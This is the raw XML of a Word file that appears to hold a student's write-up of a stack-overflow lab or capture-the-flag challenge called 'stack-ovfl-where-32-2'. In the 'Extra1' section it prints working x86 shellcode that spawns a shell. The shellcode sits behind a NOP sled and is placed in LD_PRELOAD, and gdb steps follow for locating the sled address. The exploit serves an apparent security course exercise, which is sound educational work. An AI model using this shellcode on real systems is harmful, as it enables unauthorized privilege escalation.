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0185" w14:textId="45FDC769" w:rsidR="00483AB3" w:rsidRPr="00E84232" w:rsidRDefault="00E84232">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E84232">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Extra1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D7EC13" w14:textId="02A4FBFE" w:rsidR="00E84232" w:rsidRPr="00E84232" w:rsidRDefault="00E84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4232">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>export LD_PRELOAD= 'directory(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E84232">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E84232">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)' + $(python -c 'print "SHELLCODE"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E84232">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>' )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="170AAE6C" w14:textId="463513F5" w:rsidR="00E84232" w:rsidRDefault="00E84232">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E84232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E84232">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>export LD_PRELOAD=/home/users/chench6/week3/stack-ovfl-where-32-2/$(python -c 'print "\x90"*1000 + "j2X\x99\xcd\x80\x89\xc3\x89\xc1jGX\xcd\x80Rhn/shh//bi\x89\xe3\x89\xd1j\x0bX\xcd\x80"')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4B8720" w14:textId="558BD0C2" w:rsidR="00E84232" w:rsidRDefault="00E84232">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD47F4F" w14:textId="2D443484" w:rsidR="00E84232" w:rsidRDefault="00E84232" w:rsidP="00E84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Pr="00E84232">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E84232">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stack-ovfl-where-32-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br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) b main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</w:p>
    <w:p w14:paraId="1CD1FAD2" w14:textId="6559E463" w:rsidR="00E84232" w:rsidRDefault="00E84232" w:rsidP="00E84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x/1000xw $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ebp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(find “90909090”) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D362BCB" w14:textId="77777777" w:rsidR="00E84232" w:rsidRDefault="00E84232" w:rsidP="00E84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we find the location of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>90909090</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (0xffffd778)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125F680A" w14:textId="77777777" w:rsidR="00E84232" w:rsidRDefault="00E84232" w:rsidP="00E84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0xffffd778 to program to jump then make crash and get core file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67016C5C" w14:textId="77777777" w:rsidR="00E84232" w:rsidRDefault="00E84232" w:rsidP="00E84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we can find where the shellcode is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568B7E7D" w14:textId="547BE27A" w:rsidR="00E84232" w:rsidRDefault="00E84232" w:rsidP="00E84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print it out.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E842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C666FC" wp14:editId="0E775BD3">
            <wp:extent cx="4103827" cy="1633200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6757" cy="163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52F0" w14:textId="140A6CF8" w:rsidR="00E84232" w:rsidRDefault="00E84232" w:rsidP="00E84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end, run the program manually then type the location we just get then get the flag!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F032C39" w14:textId="77C8B5B3" w:rsidR="00E84232" w:rsidRDefault="00E84232" w:rsidP="00E84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F8817" wp14:editId="2ED87119">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>848563</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1152830</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="482803" cy="165633"/>
                <wp:effectExtent l="19050" t="1905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1656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82EC8" id="Rectangle 4" o:spid="_x0000_s1026" style="position:absolute;margin-left:66.8pt;margin-top:90.75pt;width:38pt;height:1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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00E842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3C9614" wp14:editId="68D9DDF8">
            <wp:extent cx="4030675" cy="1321596"/>
            <wp:effectExtent l="0" t="0" r="825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125" cy="13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00BA" w14:textId="47665FE8" w:rsidR="00323CDD" w:rsidRDefault="00E84232" w:rsidP="00E842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2E748E" wp14:editId="6EA2F5D4">
            <wp:extent cx="3789045" cy="1053465"/>
            <wp:effectExtent l="0" t="0" r="190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0799" w14:textId="788A2933" w:rsidR="00E84232" w:rsidRDefault="00323CDD" w:rsidP="00E84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Extra 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C5FD0C" w14:textId="65647EED" w:rsidR="00323CDD" w:rsidRDefault="00323CDD" w:rsidP="00E8423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3CDD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E367937" w14:textId="6CA3F5EB" w:rsidR="00323CDD" w:rsidRDefault="00323CDD" w:rsidP="00E84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CD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B415934" wp14:editId="0871EE50">
            <wp:extent cx="2567635" cy="701675"/>
            <wp:effectExtent l="0" t="0" r="4445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8"/>
                    <a:srcRect r="3988" b="14269"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2570131" cy="702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E39C5" w14:textId="70A8A785" w:rsidR="001E0C05" w:rsidRDefault="001E0C05" w:rsidP="00E842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 make A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112F9913" w14:textId="36CE0423" w:rsidR="001E0C05" w:rsidRDefault="001E0C05" w:rsidP="00E84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C0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881781A" wp14:editId="4AC84959">
            <wp:extent cx="1543507" cy="6476368"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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7078" cy="653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D629" w14:textId="29728007" w:rsidR="00323CDD" w:rsidRDefault="00323CDD" w:rsidP="00E84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279040" w14:textId="28FBD137" w:rsidR="00323CDD" w:rsidRDefault="00323CDD" w:rsidP="00E84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960066" w14:textId="189A2598" w:rsidR="00323CDD" w:rsidRDefault="00323CDD" w:rsidP="00E84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A0F835" w14:textId="77777777" w:rsidR="00323CDD" w:rsidRPr="00323CDD" w:rsidRDefault="00323CDD" w:rsidP="00E8423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23CDD" w:rsidRPr="0032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07DEE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1FE28408"/>
    <w:lvl w:ilvl="0" w:tplc="1654EC3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DB"/>
    <w:rsid w:val="001E0C05"/>
    <w:rsid w:val="00323CDD"/>
    <w:rsid w:val="003A66DB"/>
    <w:rsid w:val="00483AB3"/>
    <w:rsid w:val="004B0921"/>
    <w:rsid w:val="00E8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11C3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0790EDD0-1BE1-49C5-8EAF-07085039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ChunYu Chen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ChunYu Chen</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-09T18:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-09T18:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>